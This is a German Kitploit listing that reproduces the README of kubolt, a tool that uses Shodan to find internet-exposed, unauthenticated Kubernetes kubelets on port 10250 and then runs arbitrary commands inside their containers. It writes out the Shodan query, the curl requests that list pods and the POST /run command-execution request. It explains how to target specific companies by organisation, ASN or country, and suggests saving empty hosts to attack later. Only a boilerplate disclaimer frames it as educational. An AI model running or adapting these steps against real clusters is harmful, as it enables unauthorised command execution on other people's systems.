Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
kubolt — Kubolt-Dienstprogramm zum Scannen öffentlicher Kubernetes-Cluster | Kitploit
Tools/GitHubGitHub/averonesis/kubolt
OSINT (Open-Source-Intelligence)AufklärungSchwachstellenscannerContainer-SicherheitCloud-SicherheitFehlkonfiguration
GitHubaveronesis/kubolt

kubolt

Kubolt-Dienstprogramm zum Scannen öffentlicher Kubernetes-Cluster

Repository anzeigen
11019vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Was?

Kubolt ist ein einfaches Dienstprogramm zum Scannen öffentlicher nicht authentifizierter Kubernetes-Cluster und zum Ausführen von Befehlen in Containern

Warum?

Manchmal ist der Kubelet-Port 10250 für unbefugten Zugriff geöffnet und ermöglicht es, Befehle in den Containern mit der getrun-Funktion von kubelet auszuführen:

root@kitploit:~
// getRun handles requests to run a command inside a container.
func (s *Server) getRun(request *restful.Request, response *restful.Response) {
	params := getExecRequestParams(request)
	pod, ok := s.host.GetPodByName(params.podNamespace, params.podName)
	if !ok {
		response.WriteError(http.StatusNotFound, fmt.Errorf("pod does not exist"))
		return
	}

Wie?

Okay, fragen wir unseren Freund Shodan :trollface:

Die grundlegende Abfrage lautet

ssl:true port:10250 404

Kubelet verwendet standardmäßig Port 10250 mit SSL, 404 ist die HTTP-Antwort ohne URL-Pfad.

Kubolt fragt Shodan per API nach einer Liste von IP-Adressen und behält sie für andere OSINT-Aktionen 😁

Zuerst fragen wir Kubelet nach laufenden Pods und filtern Hosts, bei denen die Antwort kein Unauthorized enthält und container enthält, damit wir darin einen Befehl ausführen können.

root@kitploit:~
curl -k https://IP-from-Shodan:10250/runningpods/ 

Wenn Sie den Host ohne laufende Pods finden, behalten Sie ihn für das nächste Mal, wenn Pods gestartet werden könnten 😁

Sie können alle verfügbaren Pods aus diesen Anfragen auflisten:

root@kitploit:~
curl -k https://IP-from-Shodan:10250/pods/
#or
curl http://IP-from-Shodan:10255/pods/ 

Als nächstes parst kubolt die Antwort und generiert eine neue Anfrage wie unten:

root@kitploit:~
curl -XPOST -k https://IP-from-Shodan:10250/run/<namespace>/<PodName>/<containerName> -d "cmd=<command-to-run>" 

Sie können Unternehmen gezielter ansprechen, indem Sie Shodan-Filter wie verwenden:

  • asn
  • org
  • country
  • net

Installation

root@kitploit:~
mkdir output
pip install -r requirements.txt 

Ausführen

root@kitploit:~
python kubolt.py --query "asn:123123 org:'ACME Corporation'"
#or
python kubolt.py --query "org:'ACME Corporation' country:UK"

Shodan

Kubolt verwendet die Shodan-API und Query Credits entsprechend. Wenn Sie das Tool ohne Abfragefilter ausführen, verbrauchen Sie wahrscheinlich alle Ihre Credits ¯\_(ツ)_/¯

Demo

demo

Wichtig

Das vom Autor bereitgestellte Tool sollte nur zu Bildungszwecken verwendet werden. Der Autor kann nicht für den Missbrauch des Tools verantwortlich gemacht werden. Der Autor ist nicht verantwortlich für direkte oder indirekte Schäden, die durch die Nutzung des Tools entstehen.

Tool herunterladen